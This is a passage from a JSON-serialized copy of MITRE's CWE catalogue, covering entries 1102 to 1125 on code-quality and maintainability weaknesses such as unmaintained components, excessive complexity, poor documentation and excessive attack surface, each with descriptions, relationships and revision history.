vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1102":{"attr":{"@_ID":"1102","@_Name":"Reliance on Machine-Dependent Data Representation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses a data representation that relies on low-level\\n\\t\\t\\t\\t\\tdata representation or constructs that may vary across different processors,\\n\\t\\t\\t\\t\\tphysical machines, OSes, or other physical components.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain and/or port the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1105","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1103":{"attr":{"@_ID":"1103","@_Name":"Use of Platform-Dependent Third Party Components","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product relies on third-party software components that do\\n\\t\\t\\t\\t\\tnot provide equivalent functionality across all desirable\\n\\t\\t\\t\\t\\tplatforms.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1104":{"attr":{"@_ID":"1104","@_Name":"Use of Unmaintained Third Party Components","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product relies on third-party components that are not\\n\\t\\t\\t\\t\\tactively supported or maintained by the original developer or a trusted proxy\\n\\t\\t\\t\\t\\tfor the original developer.","Extended_Description":{"xhtml:p":["Reliance on components that are no longer maintained can make it difficult or impossible to fix significant bugs, vulnerabilities, or quality issues. In effect, unmaintained code can become obsolete.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1105":{"attr":{"@_ID":"1105","@_Name":"Insufficient Encapsulation of Machine-Dependent Functionality","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product or code uses machine-dependent functionality, but\\n\\t\\t\\t\\t\\tit does not sufficiently encapsulate or isolate this functionality from\\n\\t\\t\\t\\t\\tthe rest of the code.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to port or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1106":{"attr":{"@_ID":"1106","@_Name":"Insufficient Use of Symbolic Constants","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code uses literal constants that may need to change\\n\\t\\t\\t\\t\\tor evolve over time, instead of using symbolic constants.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1107":{"attr":{"@_ID":"1107","@_Name":"Insufficient Isolation of Symbolic Constant Definitions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code uses symbolic constants, but it does not\\n\\t\\t\\t\\t\\tsufficiently place the definitions of these constants into a more centralized or\\n\\t\\t\\t\\t\\tisolated location.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1108":{"attr":{"@_ID":"1108","@_Name":"Excessive Reliance on Global Variables","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is structured in a way that relies too much on using\\n\\t\\t\\t\\t\\tor setting global variables throughout various points in the code, instead of\\n\\t\\t\\t\\t\\tpreserving the associated information in a narrower, more local\\n\\t\\t\\t\\t\\tcontext.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1109":{"attr":{"@_ID":"1109","@_Name":"Use of Same Variable for Multiple Purposes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a callable, block, or other code element in\\n\\t\\t\\t\\t\\twhich the same variable is used to control more than one unique task or store\\n\\t\\t\\t\\t\\tmore than one instance of data.","Extended_Description":{"xhtml:p":["Use of the same variable for multiple purposes can make it more difficult for a person to read or understand the code, potentially hiding other quality issues.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1110":{"attr":{"@_ID":"1110","@_Name":"Incomplete Design Documentation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s design documentation does not adequately describe\\n\\t\\t\\t\\t\\tcontrol flow, data flow, system initialization, relationships between tasks,\\n\\t\\t\\t\\t\\tcomponents, rationales, or other important aspects of the\\n\\t\\t\\t\\t\\tdesign.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1111":{"attr":{"@_ID":"1111","@_Name":"Incomplete I/O Documentation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s documentation does not adequately define inputs,\\n\\t\\t\\t\\t\\toutputs, or system/software interfaces.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1112":{"attr":{"@_ID":"1112","@_Name":"Incomplete Documentation of Program Execution","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The document does not fully define all mechanisms that are used\\n\\t\\t\\t\\t\\tto control or influence how product-specific programs are\\n\\t\\t\\t\\t\\texecuted.","Extended_Description":{"xhtml:p":"This includes environmental variables, configuration files, registry keys, command-line switches or options, or system settings."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1113":{"attr":{"@_ID":"1113","@_Name":"Inappropriate Comment Style","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code uses comment styles or formats that are\\n\\t\\t\\t\\t\\tinconsistent or do not follow expected standards for the\\n\\t\\t\\t\\t\\tproduct.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software due to insufficient legibility, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1114":{"attr":{"@_ID":"1114","@_Name":"Inappropriate Whitespace Style","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains whitespace that is inconsistent across\\n\\t\\t\\t\\t\\tthe code or does not follow expected standards for the\\n\\t\\t\\t\\t\\tproduct.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1115":{"attr":{"@_ID":"1115","@_Name":"Source Code Element without Standard Prologue","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains elements such as source files \\n\\t\\t\\t\\t\\tthat do not consistently provide a prologue or header that has been\\n\\t\\t\\t\\t\\tstandardized for the project.","Extended_Description":{"xhtml:p":["The lack of a prologue can make it more difficult to accurately and quickly understand the associated code. Standard prologues or headers may contain information such as module name, version number, author, date, purpose, function, assumptions, limitations, accuracy considerations, etc.","This issue makes it more difficult to maintain the software due to insufficient analyzability, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1116":{"attr":{"@_ID":"1116","@_Name":"Inaccurate Comments","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains comments that do not accurately\\n\\t\\t\\t\\t\\tdescribe or explain aspects of the portion of the code with which the comment is\\n\\t\\t\\t\\t\\tassociated.","Extended_Description":{"xhtml:p":["When a comment does not accurately reflect the associated code elements, this can introduce confusion to a reviewer (due to inconsistencies) or make it more difficult and less efficient to validate that the code is implementing the intended behavior correctly.","This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1117":{"attr":{"@_ID":"1117","@_Name":"Callable with Insufficient Behavioral Summary","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a function or method whose signature and/or associated\\n\\t\\t\\t\\t\\tinline documentation does not sufficiently describe the callable\'s inputs, outputs,\\n\\t\\t\\t\\t\\tside effects, assumptions, or return codes.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1078","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1118":{"attr":{"@_ID":"1118","@_Name":"Insufficient Documentation of Error Handling Techniques","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The documentation does not sufficiently describe the techniques\\n\\t\\t\\t\\t\\tthat are used for error handling, exception processing, or similar\\n\\t\\t\\t\\t\\tmechanisms.","Extended_Description":{"xhtml:p":"Documentation may need to cover error handling techniques at multiple layers, such as module, executable, compilable code unit, or callable."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1059","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1119":{"attr":{"@_ID":"1119","@_Name":"Excessive Use of Unconditional Branching","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses too many unconditional branches (such as\\n\\t\\t\\t\\t\\t\\"goto\\").","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1120":{"attr":{"@_ID":"1120","@_Name":"Excessive Code Complexity","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is too complex, as calculated using a well-defined,\\n\\t\\t\\t\\t\\tquantitative measure.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Reduce Maintainability"},{"Scope":"Other","Impact":"Reduce Performance"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1121":{"attr":{"@_ID":"1121","@_Name":"Excessive McCabe Cyclomatic Complexity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains McCabe cyclomatic complexity that exceeds a\\n\\tdesirable maximum.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-11"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-963"}},{"attr":{"@_External_Reference_ID":"REF-964"}},{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-11"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1122":{"attr":{"@_ID":"1122","@_Name":"Excessive Halstead Complexity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is structured in a way that a Halstead complexity\\n\\t\\t\\t\\t\\tmeasure exceeds a desirable maximum.","Extended_Description":{"xhtml:p":["A variety of Halstead complexity measures exist, such as program vocabulary size or volume.","This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-963"}},{"attr":{"@_External_Reference_ID":"REF-965"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1123":{"attr":{"@_ID":"1123","@_Name":"Excessive Use of Self-Modifying Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses too much self-modifying\\n\\t\\t\\t\\t\\tcode.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1124":{"attr":{"@_ID":"1124","@_Name":"Excessively Deep Nesting","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a callable or other code grouping in which\\n\\t\\t\\t\\t\\tthe nesting / branching is too deep.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1125":{"attr":{"@_ID":"1125","@_Name":"Excessive Attack Surface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product has an attack surface whose quantitative\\n\\t\\t\\t\\t\\tmeasurement exceeds a desirable maximum.","Extended_Description":{"xhtml:p":"Originating from software security, an \\"attack surface\\" measure typically reflects the number of input points and output points that can be utilized by an untrusted party, i.e. a potential attacker. A larger attack surface provides more places to attack, and more opportunities for developers to introduce weaknesses.  In some cases, this measure may reflect other aspects of quality besides security; e.g., a product with many inputs and outputs may require a large number of tests in order to improve code coverage."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-966"}},{"attr":{"@_External_Reference_ID":"REF-967"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated 